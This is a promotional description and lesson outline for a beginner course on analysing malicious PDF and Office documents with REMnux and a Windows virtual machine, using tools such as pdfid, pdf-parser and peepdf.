Did you know that you could infect your computer just by opening a pdf or microsoft office document? If that came as a shocker for you then you need to take this course. Documents are one of the main vector of attacks for malware authors because of their widespread use. Everyone uses documents to create reports, memos and articles. In fact everything we do for communication involves the use of documents. That is why this is a very popular way to infect computers. Documents are used as the first stage of a malware attack. Embedded in documents are scripts that will download a second stage payload consisting of additional malware, eg ransomware, remote access tools and more.
In this course, you will learn how to check and analyze malicious pdf and office documents for signs of malicious artifacts and indicators of compromise. This is a beginners course and targeted to those who are absolutely new to this field. I will take you from zero to proficient level in analyzing malicious documents. You will learn using plenty of practical walk-throughs. We will learn the basic knowledge and skills in analyzing documents. All the needed tools and where to download them will be provided. By the end of this course, you will have the fundamentals of malware analysis of documents under your belt to further your studies in this field. Even if you do not intend to take up malware analysis as a career, still the knowledge and skills gained would enable you to check documents for dangers and protect yourself from these attacks.
We will use remnux and windows virtual machine. Remnux is a Debian-based linux distribution that contains all the necessary tools for malware analysis. Some background on linux would be helpful but not strictly necessary. We will also install document debuggers in a windows virtual machine. Then, I will show you how to get started with the very basic tools in remnux and windows. All the essential theory will be covered but kept to the minimum. The emphasis is on practicals and lab exercises.
Go ahead and enroll now and I will see you inside.
Installing the Tools
Malware Analysis Process
-
3Installing a Windows VM
Installing Virtual Machines
-
4Configuring Windows VM
Configuring Windows VM
-
5Installing Adobe Acrobat Reader and Microsoft Office 2013
Installing Adobe Acrobat Reader and Microsoft Office 2013
-
6Installing RemNux
Installing RemNux
-
7Post-Install Configurations
Post-Install Configurations
-
8Summary of Virtual Machines
Summary of Virtual Machines
Intro to Static Analysis
Analyzing PDF Documents
Performing Javascript Analysis
-
12Introduction to Analysis of PDF Documents
Intro to analysis of pdf documents.
-
13PDF Objects
PDF Objects
-
14PDF Keywords
PDF Keywords
-
15String and Data Encoding
String and Data Encoding
-
16PDF Analysis Tools
PDF Analysis Tools
-
17Lab: Using pdfid and pdf-parser
Lab: Using pdfid and pdf-parser
-
18How to fix Yara Include File Error
How to fix Yara Include File Error
-
19Lab: Using peepdf
Lab: Using peepdf
Lab: Pdf Analysis
Analyzing Office Documents
Performing VBA Script Analysis
Using Debuggers in Document Analysis
Lab: Analyzing An Office Document
Resources For Further Study
-
31Introduction Lab Exercise: Analyzing An Office Document
Introduction Lab Exercise: Analyzing An Office Document
-
32Lab Walkthrough: Document Analysis
Lab Walkthrough: Document Analysis
-
33Lab Walkthrough: Debugging A Malicious Office Document
Lab Walkthrough: Debugging A Malicious Office Document